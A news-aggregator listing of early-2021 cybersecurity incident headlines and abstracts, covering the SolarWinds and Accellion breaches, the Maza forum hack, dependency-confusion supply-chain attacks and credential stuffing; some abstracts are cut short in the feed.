Colorado-Based Sengrid Email Marketing Company Accounts Were Hacked Full Text
Abstract
It appears the attackers used Zoom invites as a lure together with an extensive list of email addresses, in this way “Contact” was able to deliver messages from hacked accounts on the SendGrid cloud-based platform.Heimdal Security
March 5, 2021
D-Link, IoT Devices Under Attack By Tor-Based Gafgyt Variant Full Text
Abstract
A new variant of the Gafgyt botnet – that’s actively targeting vulnerable D-Link and Internet of Things devices – is the first variant of the malware to rely on Tor communications, researchers say.Threatpost
March 5, 2021
Docker Hub and Bitbucket Resources Hijacked for Crypto-Mining Full Text
Abstract
Developer environments seen as an easy target for attackInfosecurity Magazine
March 05, 2021
Mazafaka — Elite Hacking and Cybercrime Forum — Got Hacked! Full Text
Abstract
In what's a case of hackers getting hacked, a prominent underground online criminal forum by the name of Maza has been compromised by unknown attackers, making it the fourth forum to have been breached since the start of the year. The intrusion is said to have occurred on March 3, with information about the forum members — including usernames, email addresses, and hashed passwords — publicly disclosed on a breach notification page put up by the attackers, stating "Your data has been leaked" and "This forum has been hacked." "The announcement was accompanied by a PDF file allegedly containing a portion of forum user data. The file comprised more than 3,000 rows, containing usernames, partially obfuscated password hashes, email addresses and other contact details," cybersecurity firm Intel 471 said . Originally called Mazafaka, Maza is an elite, invite-only Russian-language cybercrime forum known to be operational as early as 2003, acting as an excThe Hacker News
March 5, 2021
Fraudsters Circumvent 3D Secure with Social Engineering Full Text
Abstract
Widespread chatter on dark web highlights gaps in payment protectionInfosecurity Magazine
March 04, 2021
Notorious Maza cybercrime forum attacked by other hackers Full Text
Abstract
The Maza cybercrime forum was hacked and member data leaked in the latest of a series of attacks targeting mostly Russian-speaking hacker forums.BleepingComputer
March 04, 2021
Maza forum hacked in recent attacks targeting cybercrime forums Full Text
Abstract
The Maza cybercrime forum was hacked and member data leaked in the latest of a series of attacks targeting mostly Russian-speaking hacker forums.BleepingComputer
March 03, 2021
Cybersecurity firm Qualys is the latest victim of Accellion hacks Full Text
Abstract
Cybersecurity firm Qualys is the latest victim to have suffered a data breach after a zero-day vulnerability in their Accellion FTA server was exploited to steal hosted files.BleepingComputer
March 3, 2021
Recovering from the SolarWinds hack could take 18 months Full Text
Abstract
Fully recovering from the SolarWinds hack will take the US government from a year to as long as 18 months, according to the head of the agency that is leading Washington’s recovery.Technology Review
March 3, 2021
Microsoft: SolarWinds Attack Highlights Growing Sophistication of Nation State Actors Full Text
Abstract
Microsoft discusses the changing threat landscapeInfosecurity Magazine
March 03, 2021
Cybersecurity firm Qualys likely latest victim of Accellion hacks Full Text
Abstract
Cybersecurity firm Qualys is the latest victim to have suffered a data breach after a zero-day vulnerability in their Accellion FTA server was exploited to steal hosted files.BleepingComputer
March 3, 2021
Brand(ed) Lures and GuLoader - The New Face of Email-based Attacks Full Text
Abstract
After studying millions of email-based attacks, researchers note a unique trend in malware-stealing attempts and disclose details about the success recipe of a top malware used by them.Cyware Alerts - Hacker News
March 3, 2021
Securing Space: The Next Frontier of Credential-Based Attacks Full Text
Abstract
Examples of critical infrastructure in space include the NASA satellites orbiting Earth, which are equipped with cameras and scientific sensors to collect data about the planet.Nextgov
March 3, 2021
Attackers took over the Perl.com domain in September 2020 Full Text
Abstract
The Perl.com domain was hijacked in January, but a senior editor at the site revealed that the hackers took control of the domain in September 2020. The Perl.com domain was hijacked in January 2021, but according to Brian Foy, senior editor of Perl.com,...Security Affairs
March 3, 2021
Update: Oxfam Australia confirms ‘supporter’ data accessed in cyber attack Full Text
Abstract
In an update on Monday, Oxfam Australia said it had found “supporter’s information on one of its databases was unlawfully accessed by an external party on 20 January 2021”.IT News
March 2, 2021
Post-Cyberattack, Universal Health Services Faces $67M in Losses Full Text
Abstract
The Fortune-500 hospital network owner is facing steep costs in damages after a cyberattack impacted patient care and billing in September and October.Threatpost
March 2, 2021
French multinational dairy Lactalis hit by a cyber attack Full Text
Abstract
French multinational dairy products corporation Lactalis discloses cyberattack, but claimed that had no evidence of a data breach. France-based dairy giant Lactalis announced that it was hit by a cyber attack, but claimed that it had found no evidence...Security Affairs
March 01, 2021
World’s leading dairy group Lactalis hit by cyberattack Full Text
Abstract
Lactalis, the world's leading dairy group, has disclosed a cyberattack after unknown threat actors have breached some of the company's systems.BleepingComputer
March 01, 2021
SolarWinds Blames Intern for Weak Password That Led to Biggest Attack in 2020 Full Text
Abstract
As cybersecurity researchers continue to piece together the sprawling SolarWinds supply chain attack , top executives of the Texas-based software services firm blamed an intern for a critical password lapse that went unnoticed for several years. The said password " solarwinds123 " was originally believed to have been publicly accessible via a GitHub repository since June 17, 2018, before the misconfiguration was addressed on November 22, 2019. But in a hearing before the House Committees on Oversight and Reform and Homeland Security on SolarWinds on Friday, CEO Sudhakar Ramakrishna testified that the password had been in use as early as 2017. While a preliminary investigation into the attack revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor, Crowdstrike's incident response efforts pointed to a reviThe Hacker News
February 28, 2021
New Zealand-based cryptocurrency exchange Cryptopia hacked again Full Text
Abstract
The New Zealand-based cryptocurrency exchange Cryptopia suffered a new cyber heist while it is in liquidation due to a 2019 security breach. In 2019, the New Zealand-based cryptocurrency exchange Cryptopia discloses a cyber attack that took place...Security Affairs
February 27, 2021
T-Mobile customers were hit with SIM swapping attacks Full Text
Abstract
The telecommunications giant T-Mobile disclosed a data breach after some of its customers were apparently affected by SIM swap attacks. The telecommunications provider T-Mobile has disclosed a data breach after it became aware that some of its customers...Security Affairs
February 26, 2021
Cryptocurrency exchange in liquidation due to hack, hacked again Full Text
Abstract
The same cryptocurrency exchange has been hacked again, and this time the attackers stole USD 45,000 (NZD 62,000) worth of crypto, reported local news network Stuff.co.NZ.Hackread
February 26, 2021
FBI Investigating Michigan School District Hack Full Text
Abstract
Saginaw Township Community Schools targeted in ransomware attackInfosecurity Magazine
February 26, 2021
Poland’s CD Projekt delays Cyberpunk 2077 fix due to cyber attack Full Text
Abstract
Polish video games maker CD Projekt is delaying the release of a patch for its Cyberpunk 2077 game until the second half of March, after a cyberattack slowed down work on fixes for the troubled game.Reuters
February 26, 2021
Npower Ditches App After Credential Stuffing Attacks Full Text
Abstract
Energy giant has informed affected customersInfosecurity Magazine
February 26, 2021
Oxford University Research Lab Studying the Coronavirus Becomes Victim of Cyberattack Full Text
Abstract
Oxford reported on Thursday that one of its research labs dedicated to studying COVID-19 suffered a cyberattack, following a Forbes investigation indicating external access to a number of its systems.The Verge
February 25, 2021
Cyberattacks Launch Against Vietnamese Human-Rights Activists Full Text
Abstract
Vietnam joins the ranks of governments using spyware to crack down on human-rights defenders.Threatpost
February 25, 2021
Credential Stuffing Attack on Energy Firm Npower’s App Exposed Customers’ Personal and Banking Details Full Text
Abstract
Contact details, birth dates, addresses, and partial bank account numbers are among the details believed stolen. But the affected accounts had been locked, Npower told the BBC.BBC
February 25, 2021
U.S. Senators: AWS Infrastructure Used In SolarWinds Attack Full Text
Abstract
US Senators slammed Amazon Web Services for refusing to testify at a hearing about the SolarWinds intrusion given the public cloud giant’s infrastructure was used in the attack.CRN
February 25, 2021
Attackers scan for vulnerable VMware servers after PoC exploit release Full Text
Abstract
After security researchers have developed and published proof-of-concept (PoC) exploit code targeting a critical vCenter remote code execution (RCE) vulnerability, attackers are now actively scanning for vulnerable Internet-exposed VMware servers.BleepingComputer
February 24, 2021
CrowdStrike Slams Microsoft Over SolarWinds Hack Full Text
Abstract
Tech companies point fingers at customers and one another in SolarWinds Senate hearingInfosecurity Magazine
February 24, 2021
Five Eyes members warn of Accellion FTA extortion attacks Full Text
Abstract
Four members of Five Eyes, in collaboration with Singapore as an active contributor, have issued a joint security advisory about ongoing attacks and extortion attempts targeting organizations using the Accellion File Transfer Appliance (FTA).BleepingComputer
February 24, 2021
Experts Warns of Notable Increase in QuickBooks Data Files Theft Attacks Full Text
Abstract
New research has uncovered a significant increase in QuickBooks file data theft using social engineering tricks to deliver malware and exploit the accounting software. "A majority of the time, the attack involves basic malware that is often signed, making it hard to detect using antivirus or other threat detection software," researchers from ThreatLocker said in an analysis shared today with The Hacker News. QuickBooks is an accounting software package developed and marketed by Intuit. The spear-phishing attacks take the form of a PowerShell command that's capable of running inside of the email, the researchers said, adding, a second attack vector involves decoy documents sent via email messages that, when opened, runs a macro to download malicious code which uploads QuickBooks files to an attacker-controlled server. Alternatively, bad actors have also been spotted running a PowerShell command called Invoke-WebRequests on target systems to upload relevant data toThe Hacker News
February 24, 2021
Five Eyes warns of Accellion FTA attacks leading to extortion Full Text
Abstract
Five Eyes members have issued a joint security advisory regarding ongoing attacks and extortion attempts targeting organizations using the out-of-support Accellion File Transfer Appliance (FTA).BleepingComputer
February 24, 2021
SonicWall Was Hacked. Was It Also Extorted? Full Text
Abstract
Cybersecurity companies advise their clients not to pay ransoms for good reasons: Pay once and the attackers may come back with their hand out again. It also promotes a cybercrime business model.Gov Info Security
February 23, 2021
Shadow Attacks Let Attackers Replace Content in Digitally Signed PDFs Full Text
Abstract
Researchers have demonstrated a novel class of attacks that could allow a bad actor to potentially circumvent existing countermeasures and break the integrity protection of digitally signed PDF documents. Called " Shadow attacks " by academics from Ruhr-University Bochum, the technique uses the "enormous flexibility provided by the PDF specification so that shadow documents remain standard-compliant." The findings were presented yesterday at the Network and Distributed System Security Symposium (NDSS), with 16 of the 29 PDF viewers tested — including Adobe Acrobat, Foxit Reader, Perfect PDF, and Okular — found vulnerable to shadow attacks. To carry out the attack, a malicious actor creates a PDF document with two different contents: one which is the content that's expected by the party signing the document, and the other, a piece of hidden content that gets displayed once the PDF is signed. "The signers of the PDF receive the document, review it, and sThe Hacker News
February 23, 2021
FireEye: Accellion FTA Attacks Could be FIN11 Full Text
Abstract
Cybercrime group linked to theft and extortionInfosecurity Magazine
February 23, 2021
South Carolina County Rebuilds Network After Hacking Full Text
Abstract
Hackers sent an email on Jan 22 that allowed them to take over Georgetown County’s computers. They demanded a ransom to return the system to the county’s control, spokeswoman Jackie Broach said.Security Week
February 22, 2021
Ukraine sites suffered massive attacks launched from Russian networks Full Text
Abstract
Ukraine 's government accused unnamed Russian traffic networks as the source of massive attacks on Ukrainian security and defense websites. Today Ukraine accused unnamed Russian internet networks of massive attacks that targeted Ukrainian security...Security Affairs
February 22, 2021
Georgetown County has yet to recover from a sophisticated cyber attack Full Text
Abstract
The systems of Georgetown County have been hacked at the end of January, and the county staff is still working to rebuild its computer network. The systems of Georgetown County have been hit with a sophisticated cyber attack at the end of January,...Security Affairs
February 22, 2021
Silicon Valley VC Firm Phished Full Text
Abstract
Sequoia Capital tells investors that it has been hackedInfosecurity Magazine
February 22, 2021
Criminals leveraging shift to remote work to develop targeted attacks Full Text
Abstract
Malwarebytes announced the findings of its report which explores how the global pandemic forced many employees to quickly become a remote workforce and confined consumers to their homes.Help Net Security
February 22, 2021
Beneteau to Suspend Some Production After Cyberattack Full Text
Abstract
While the deployment of backup systems will allow Beneteau’s activities to start again, production at some of its units, particularly in France, will have to slow down or stop for a few days.Bloomberg
February 21, 2021
Lakehead University shuts down campus network after cyberattack Full Text
Abstract
Canadian undergraduate research university Lakehead has been dealing with a cyberattack that forced the institution earlier this week to cut off access to its servers.BleepingComputer
February 20, 2021
Sequoia Capital says it was hacked Full Text
Abstract
As per Axios, Sequoia Capital told its investors that some of their personal and financial information may have been accessed by a third party, after a Sequoia employee's email was successfully phished.Axios
February 20, 2021
Lakehead University Shuts Down Campuses and Computers After Cyberattack Full Text
Abstract
In response to the attack, officials shut down all computer systems at the Thunder Bay and Orillia campuses. The message sent to faculty members doesn’t say how the threat actors managed to infiltrate the information systems of the university.Bit Defender
February 19, 2021
Credential-Stuffing Attack Targets Regional Internet Registry Full Text
Abstract
RIPE NCC, the regional Internet registry for Europe, West Asia, and the former Soviet Union, said attackers attempted a credential-stuffing attack against its single-sign on service.Threatpost
February 19, 2021
New Hack Lets Attackers Bypass MasterCard PIN by Using Them As Visa Card Full Text
Abstract
Cybersecurity researchers have disclosed a novel attack that could allow criminals to trick a point of sale terminal into transacting with a victim's Mastercard contactless card while believing it to be a Visa card. The research, published by a group of academics from the ETH Zurich, builds on a study detailed last September that delved into a PIN bypass attack, permitting bad actors to leverage a victim's stolen or lost Visa EMV-enabled credit card for making high-value purchases without knowledge of the card's PIN, and even fool the terminal into accepting unauthentic offline card transactions. "This is not just a mere card brand mixup but it has critical consequences," researchers David Basin, Ralf Sasse, and Jorge Toro said. "For example, criminals can use it in combination with the previous attack on Visa to also bypass the PIN for Mastercard cards. The cards of this brand were previously presumed protected by PIN." Following responsible discThe Hacker News
February 19, 2021
Hiding in Plain Sight: What the SolarWinds Attack Revealed About Efficacy Full Text
Abstract
The SolarWinds breach is a reminder that, in general, any company that relies heavily on tools alone to secure its network infrastructure and software is taking an enormous risk.Dark Reading
February 19, 2021
Internet Registry RIPE NCC Warns of Credential Stuffing Attack Full Text
Abstract
Attackers unsuccessfully targeted its single sign-on serviceInfosecurity Magazine
February 19, 2021
Internet Registry for Europe experienced a credential-stuffing attack Full Text
Abstract
The Regional Internet Registry for Europe and part of Asia (RIPE NCC) said its single sign-on (SSO) service experienced a suspected credential-stuffing attack, which caused a short outage.Cyber News
February 18, 2021
Credential stuffing attack hit RIPE NCC: Members have to enable 2FA Full Text
Abstract
RIPE NCC has disclosed a failed credential stuffing attack against its infrastructure, it asking its members to enable 2FA for their accounts. RIPE NCC announced to have suffered a credential stuffing attack attempting to gain access to single sign-on...Security Affairs
February 18, 2021
RIPE NCC Internet Registry discloses SSO credential stuffing attack Full Text
Abstract
RIPE NCC is warning members that they suffered a credential stuffing attack attempting to gain access to single sign-on (SSO) accounts.BleepingComputer
February 18, 2021
SolarWinds attack hit 100 companies and took months of planning, says White House Full Text
Abstract
The White House team leading the investigation into the SolarWinds hack is worried that the breach of 100 US companies has the potential to make the initial compromise a headache in future.ZDNet
February 18, 2021
FBI: Telephony denial-of-service attacks can lead to loss of lives Full Text
Abstract
The Federal Bureau of Investigation (FBI) has warned of the harsh consequences of telephony denial-of-service (TDoS) attacks and has also provided the steps needed to mitigate their impact.BleepingComputer
February 18, 2021
Top 10 most used MITRE ATT&CK tactics and techniques Full Text
Abstract
The MITRE ATT&CK framework is a well known and widely used knowledge base of cyber adversary tactics, techniques and procedures, and is based on observations on real-world attacks.Help Net Security
February 18, 2021
Centreon Says that Russian Hackers Hit Older Versions of the Software Full Text
Abstract
Centreon, a French software company, published a blog providing clarification on a report published by ANSSI , CERTFR-2021-CTI-004.According to Centreon, Russian Hackers...Cyber Security News
February 18, 2021
Centreon says that recently disclosed campaigns only targeted obsolete versions of its open-source software Full Text
Abstract
The first attack spotted by ANSSI experts dates back to the end of 2017 and the campaign continued until 2020. Threat actors mainly targeted IT service providers, particularly web hosting.Security Affairs
February 17, 2021
Windows, Linux Devices Hijacked In Two-Year Cryptojacking Campaign Full Text
Abstract
The WatchDog malware has flown under the radar for two years in what researchers call one of the ‘largest’ Monero cryptojacking attacks ever.Threatpost
February 17, 2021
Simon Fraser University Discloses Cyberattack Exposing Personal Information of About 200,000 Students, Staff, and Alumni Full Text
Abstract
The school says about 200,000 people were affected by the breach. The server contained personal information for some current and former students, faculty, staff, and student applicants.CBC
February 17, 2021
Centreon: Sandworm Attacks Targeted Legacy Open Source Product Full Text
Abstract
French IT monitoring firm says around 15 organizations were impactedInfosecurity Magazine
February 16, 2021
Microsoft: Web Shells Attacks Spreading Like Wildfire Full Text
Abstract
According to Microsoft, web shells are among critical tools used by hackers as it records around 140,000 web shells a month between August 2020 and January 2021.Cyware Alerts - Hacker News
February 15, 2021
Cyberattack on Dutch Research Council (NWO) suspends research grants Full Text
Abstract
Servers belonging to the Dutch Research Council (NWO) have been compromised, forcing the organization to make its network unavailable and suspend subsidy allocation for the foreseeable future.BleepingComputer
February 15, 2021
Frequent Attacks on Google Services and Products: A Worrisome Situation Full Text
Abstract
Google products and services have long been targets of cybercrime, majorly due to its userbase. Recently, many attacker groups attempted to exploit Google systems in a variety of campaigns.Cyware Alerts - Hacker News
February 12, 2021
Microsoft: web shell attacks have doubled over the past year Full Text
Abstract
While they’re easy for attackers to set up, web shells can be difficult for defenders to detect, since they’re often targeted to specific servers and can hide in the noise of internet traffic, scanning, probing and unsuccessful attacks that most organizations see on a daily basis.SCMagazine
February 12, 2021
Copycats imitate novel supply chain attack that hit tech giants Full Text
Abstract
This week, hundreds of new packages have been published to the npm open-source repository named after private components being internally used by major companies. These npm packages are identical to the proof-of-concept packages created by Alex Birsan, the researcher who had recently managed to infiltrate over major 35 tech firms.BleepingComputer
February 12, 2021
Dependency Confusion - Novel Supply Chain Attack Technique Full Text
Abstract
Microsoft warned of a new type of attack technique that can be used to poison the app-building process. The attack was tested against at least 35 major tech firms.Cyware Alerts - Hacker News
February 12, 2021
Browser Extensions Gain Traction as Attack Vector Full Text
Abstract
Malicious browser extensions are increasingly being used to infect millions of users across the world to monitor their browsing activity, exfiltrate stolen data, send malicious commands, and more.Cyware Alerts - Hacker News
February 12, 2021
Copycat researchers imitate supply chain attack that hit tech giants Full Text
Abstract
This week, hundreds of new packages have been published to the npm open-source repository named after private components being internally used by major companies. These npm packages are identical to the proof-of-concept packages created by Alex Birsan, the researcher who had recently managed to infiltrate over major 35 tech firms.BleepingComputer
February 12, 2021
Singtel Suffers Zero-Day Cyberattack, Damage Unknown Full Text
Abstract
The Tier 1 telecom giant was caught up in a coordinated, wide-ranging attack using unpatched security bugs in the Accellion legacy file-transfer program.Threatpost
February 12, 2021
Florida Water Plant Hack: Leaked Credentials Found in Breach Database Full Text
Abstract
Researchers discovered credentials for the Oldsmar water treatment facility in the massive compilation of data from breaches posted just days before the attack.Threatpost
February 12, 2021
Microsoft warns of the rise of web shell attacks Full Text
Abstract
Researchers from Microsoft are warning that the number of monthly web shell attacks has doubled since last year. Microsoft reported that the number of monthly web shell attacks has almost doubled since last year, its experts observed an average of 140,000...Security Affairs
February 12, 2021
Blocked accounts abused in Evolution CMS SQL injection attacks Full Text
Abstract
On February 8, Synactiv revealed two security flaws in the CMS and how a “blocked account” can be exploited to perform an “unauthenticated SQLi in Evolution CMS using the X-Forwarded-For header”.The Daily Swig
February 11, 2021
Microsoft warns of an increasing number of web shell attacks Full Text
Abstract
Microsoft says that the number of monthly web shell attacks has almost doubled since last year, with an average of 140,000 such malicious tools being found on compromised servers every month.BleepingComputer
February 11, 2021
UN Links North Korea to $281m Crypto Exchange Heist Full Text
Abstract
Most funds recovered but attack bears hallmarks of hermit kingdomInfosecurity Magazine
February 11, 2021
Poor Password Security Lead to Recent Water Treatment Facility Hack Full Text
Abstract
New details have emerged about the remote computer intrusion at a Florida water treatment facility last Friday, highlighting a lack of adequate security measures needed to bulletproof critical infrastructure environments. The breach, which occurred last Friday, involved an unsuccessful attempt on the part of an adversary to increase sodium hydroxide dosage in the water supply to dangerous levels by remotely accessing the SCADA system at the water treatment plant. The system's plant operator, who spotted the intrusion, quickly took steps to reverse the command, leading to minimal impact. Now, according to an advisory published on Wednesday by the state of Massachusetts, unidentified cyber actors accessed the supervisory control and data acquisition (SCADA) system via TeamViewer software installed on one of the plant's several computers that were connected to the control system. Not only were these computers running 32-bit versions of the Windows 7 operating system, butThe Hacker News
February 11, 2021
Researchers Hacked into Microsoft, Apple, more in Novel Supply Chain Attack Full Text
Abstract
Ethical hacker, Alex Birsan, has demonstrated that it is possible to breach the systems of tech giants by utilizing a novel supply...Cyber Security News
February 10, 2021
Hybrid, Older Users Most-Targeted by Gmail Attackers Full Text
Abstract
Researchers at Google and Stanford analyzed a 1.2 billion malicious emails to find out what makes users likely to get attacked. 2FA wasn’t a big factor.Threatpost
February 10, 2021
Researcher Hacks Apple and Microsoft Full Text
Abstract
Novel supply chain attack allows researcher to hack internal systems of major companiesInfosecurity Magazine
February 10, 2021
Supply-Chain Hack Breaches 35 Companies, Including PayPal, Microsoft, Apple Full Text
Abstract
Ethical hacker Alex Birsan developed a way to inject malicious code into open-source developer tools to exploit dependencies in organizations internal applications.Threatpost
February 10, 2021
Attackers Using Sophisticated Obfuscation Techniques to Evade Detection Full Text
Abstract
Security experts stumbled across an unusual DNS query that eventually led to the discovery of a multi-step obfuscated malware using nslookup.exe to hide the actual malicious intent.Cyware Alerts - Hacker News
February 10, 2021
Web hosting provider shuts down after cyberattack Full Text
Abstract
A web hosting company named No Support Linux Hosting announced today it was shutting down after a hacker breached its internal systems and compromised its entire operation.ZDNet
February 10, 2021
Dependency Confusion Supply-Chain Attack Hit Over 35 High-Profile Companies Full Text
Abstract
In what's a novel supply chain attack, a security researcher managed to breach over 35 major companies' internal systems, including that of Microsoft, Apple, PayPal, Shopify, Netflix, Yelp, Tesla, and Uber, and achieve remote code execution. The technique, called dependency confusion or a substitution attack, takes advantage of the fact that a piece of software may include components from a mix of private and public sources. These external package dependencies, which are fetched from public repositories during a build process, can pose an attack opportunity when an adversary uploads a higher version of a private module to the public feed, causing a client to automatically download the bogus "latest" version without requiring any action from the developer. "From one-off mistakes made by developers on their own machines, to misconfigured internal or cloud-based build servers, to systemically vulnerable development pipelines, one thing was clear: squatting valThe Hacker News
February 10, 2021
Microsoft Discloses New ‘Dependency Confusion’ Attack Technique Used to Target 35 Major Tech Firms Full Text
Abstract
Microsoft published a white paper on a new technique called a "dependency confusion" or a "substitution attack" that can be used to poison the app-building process inside corporate environments.ZDNet
February 9, 2021
A water-treatment hacking, and the complexities of risk mitigation Full Text
Abstract
How do you define risk? For those in the cybersecurity community, risk is usually defined by degree of exposure an organization might have to losses tied to breaches or system attacks. But ask that same question of a hospital administrator struggling to treat COVID patients and the answer might be tied to the number of…SCMagazine
February 09, 2021
Researcher hacks Microsoft, Apple, more in novel supply chain attack Full Text
Abstract
A researcher managed to hack systems of over 35 major tech companies including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla, Yelp, Tesla, and Uber in a novel software supply chain attack. For his ethical hacking research efforts, the researcher has been awarded over $130,000 in bug bounties.BleepingComputer
February 9, 2021
Supply Chain Attacks Back on the Forefront Full Text
Abstract
ESET researchers recently disclosed a cyber-espionage attack campaign targeting Asian gamers, that jeopardized the update mechanism of NoxPlayer, an Android emulator for Macs and PCs.Cyware Alerts - Hacker News
February 9, 2021
Microsoft, SolarWinds in dispute over nation-state attacks Full Text
Abstract
In separate blog posts last week, the two companies provided updates on their ongoing investigations into how nation-state actors initially compromised SolarWinds' environment.Tech Target
February 9, 2021
Cyberpunk 2077 Developer Hit By Cyber-Attack Full Text
Abstract
Video game firm CD Projekt reveals a ransom note left by the attackersInfosecurity Magazine
February 9, 2021
Microsoft to notify Office 365 users of nation-state attacks Full Text
Abstract
Microsoft implements alerts for 'nation-state activity' in the Defender for Office 365 dashboard, to allow organizations to quickly respond. Since 2016, Microsoft has been alerting users of nation-state activity, now the IT giant added the same service...Security Affairs
February 8, 2021
Tens of Thousands of Patient Files Leaked in US Hospital Attacks Full Text
Abstract
Ransomware group suspected, but lack of malware perplexesInfosecurity Magazine
February 6, 2021
SolarWinds CEO Confirms Office 365 Email ‘Compromise’ Played Role In Broad-Based Attack Full Text
Abstract
SolarWinds CEO Sudhakar Ramakrishna verified this week “suspicious activity” in its Office 365 environment allowed hackers to gain access to and exploit the SolarWinds Orion development environment.CRN
February 5, 2021
Cyber-Attack on Woodland Trust Full Text
Abstract
Conservation charity notifies members of sophisticated December cyber-assaultInfosecurity Magazine
February 4, 2021
Spotify Suffers Second Credential-Stuffing Cyberattack in 3 Months Full Text
Abstract
As many as 100,000 of the music streaming service’s customers could face account takeover.Threatpost
February 4, 2021
Automated Tools Increasingly Used to Launch Cyber-Attacks Full Text
Abstract
Over half of attacks detected by Barracuda involve the use of automationInfosecurity Magazine
February 3, 2021
Second SolarWinds Attack Group Breaks into USDA Payroll — Report Full Text
Abstract
A second APT, potentially linked to the Chinese government, could be behind the Supernova malware.Threatpost
February 3, 2021
Alleged China-linked hackers used SolarWinds bug to breach National Finance Center Full Text
Abstract
Alleged China-linked hackers have exploited a flaw in the SolarWinds Orion software to hack systems at the U.S. National Finance Center. FBI investigators discovered that allegedly China-linked hackers have exploited a flaw in the SolarWinds Orion...Security Affairs
February 3, 2021
A New Supply Chain Attack Targets Gaming Companies in Asia Full Text
Abstract
ESET researchers uncover a new supply-chain attack used in a cyberespionage operation targeting online‑gaming communities in Asia. The new...Cyber Security News
February 02, 2021
US federal payroll agency hacked using SolarWinds software flaw Full Text
Abstract
The FBI has discovered that the National Finance Center (NFC), a U.S. Department of Agriculture (USDA) federal payroll agency, was compromised by exploiting a SolarWinds Orion software flaw, according to a Reuters report.BleepingComputer
February 2, 2021
South Carolina County Still Reeling from January Cyber-Attack Full Text
Abstract
Georgetown County still working to repair network brought down by cyber-criminalsInfosecurity Magazine
February 2, 2021
CISA: Many victims of SolarWinds hackers had no direct connection to SolarWinds Full Text
Abstract
The U.S. CISA reveals that many of the victims of the SolarWinds hackers had no direct connection to SolarWinds. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that many of the organizations targeted by SolarWinds hackers...Security Affairs
February 1, 2021
Operation NightScout: supply chain attack on NoxPlayer Android emulator Full Text
Abstract
Experts uncovered a new supply chain attack leveraging the update process of NoxPlayer, a free Android emulator for PCs and Macs. A new supply chain attack made the headlines, a threat actor has compromised the update process of NoxPlayer, a free...Security Affairs
February 1, 2021
British Mensa Website Hack Results in Theft of Members’ Personal Data Full Text
Abstract
British Mensa, the society for people with high IQs, failed to properly secure the passwords on its website, prompting a hack on its website that has resulted in the theft of members’ personal data.Forbes
February 1, 2021
Chopper ASPX web shell used in targeted attack Full Text
Abstract
Web shells can be embedded on servers and can be used by attackers to launch arbitrary code. In as little as 15 bytes, web shells can enable remote administration of an infected machine or system.Trend Micro
January 31, 2021
USCellular Hacked – Hackers Gained access to its CRM Software Full Text
Abstract
USCellular is one of the mobile network operators that protect its customer's privacy and strictly follows all its protection policies. But, recently,...Cyber Security News
January 30, 2021
UScellular data breach: attackers ported customer phone numbers Full Text
Abstract
US wireless carrier UScellular discloses data breach, personal information of customers may have been exposed and their phone numbers ported. US wireless carrier UScellular discloses a data breach that exposed personal information of its customers. United...Security Affairs
January 29, 2021
As SolarWinds spooks tech firms into rechecking code, some won’t like what they find Full Text
Abstract
If more attacks are uncovered, end-user organizations must apply lessons learned from SolarWinds and take decisive action.SCMagazine
January 29, 2021
Domain for programming website Perl.com hijacked Full Text
Abstract
Threat actors took over the domain name perl.com and pointed it to an IP address associated with malware campaigns. Attackers have taken over the official domain name of The Perl Foundation perl.com and pointed it to an IP address associated with...Security Affairs
January 29, 2021
Does SolarWinds change the rules in offensive cyber? Experts say no, but offer alternatives Full Text
Abstract
While tempting, most experts agree that hack-back strategies are a bad idea for companies. But there are tactics that can help deter nation-state actors and limit their ability to penetrate networks.SCMagazine
January 29, 2021
Attacks on Individuals Fall as Cybercrime Shifts Tactics Full Text
Abstract
Cybercriminals shifted away from stealing individual consumers’ information in 2020 to focus on bigger, more profitable attacks on businesses, as per a report from the Identity Theft Resource Center.Security Week
January 29, 2021
A Fifth of Sunburst Backdoor Victims from Manufacturing Industry Full Text
Abstract
18% of all victims of the Sunburst backdoor are manufacturing organizationsInfosecurity Magazine
January 29, 2021
Perl.com domain stolen, now using IP address tied to malware Full Text
Abstract
The domain name perl.com was stolen this week and is now points to an IP address associated with malware campaigns.BleepingComputer
January 29, 2021
Perl-clutching hijackers appear to have seized control of 33-year-old programming language’s .com domain Full Text
Abstract
The domain hijacking incident appears to have followed the age-old path of an attacker pouncing on a compromised account and swiping the domain rather than a simple expiration.The Register
January 28, 2021
Hezbollah hackers attack unpatched Atlassian servers at telcos, ISPs Full Text
Abstract
Volatile Cedar, an advanced hacker group believed to be connected to the Lebanese Hezbollah Cyber Unit, has been silently attacking companies around the world in espionage operations.BleepingComputer
January 28, 2021
Blind TCP/IP hijacking is resurrected for Windows 7 Full Text
Abstract
Although Microsoft deemed the bug “very difficult” to exploit and therefore only fixed it in Windows 8, researcher Adam Zabrocki says that he was able to rework the attack for use against Windows 7.The Daily Swig
January 28, 2021
Mimecast Confirms SolarWinds Hack as List of Security Vendor Victims Snowball Full Text
Abstract
A growing number of cybersecurity vendors like CrowdStrike, Fidelis, FireEye, Malwarebytes, Palo Alto Networks and Qualys are confirming being targeted in the espionage attack.Threatpost
January 27, 2021
Hundreds of Industrial Organizations Received Sunburst Malware in SolarWinds Attack Full Text
Abstract
Kaspersky’s industrial cybersecurity researchers analyzed a list of nearly 2,000 domains impacted by Sunburst and estimated that roughly 32% of them were associated with industrial organizations.Security Week
January 27, 2021
More Security Vendors Admit to SolarWinds Attacks Full Text
Abstract
Scale of the cyber-espionage campaign continues to growInfosecurity Magazine
January 27, 2021
New Attack Could Let Remote Hackers Target Devices On Internal Networks Full Text
Abstract
A newly devised variant of the NAT Slipstreaming attack can be leveraged to compromise and expose any device in an internal network, according to the latest research. Detailed by enterprise IoT security firm Armis, the new attack (CVE-2020-16043 and CVE-2021-23961) builds on the previously disclosed technique to bypass routers and firewalls and reach any unmanaged device within the internal network from the Internet. First disclosed by security researcher Samy Kamkar in late October 2020, the JavaScript-based attack relied on luring a user into visiting a malicious website to circumvent browser-based port restrictions and allow the attacker to remotely access TCP/UDP services on the victim's device, even those that were protected by a firewall or NAT. Although partial mitigations were released on November 11 to thwart the attack in Chrome 87 , Firefox 84 , and Safari by preventing connections on port 5060 or 5061, Armis researchers Ben Seri and Gregory Vishnipolsky rThe Hacker News
January 27, 2021
Manufacturing Giant Suffers Major Cyber-Disruption Full Text
Abstract
Attack bears the hallmarks of ransomwareInfosecurity Magazine
January 26, 2021
Fidelis, Mimecast, Palo Alto Networks, Qualys also impacted by SolarWinds hack Full Text
Abstract
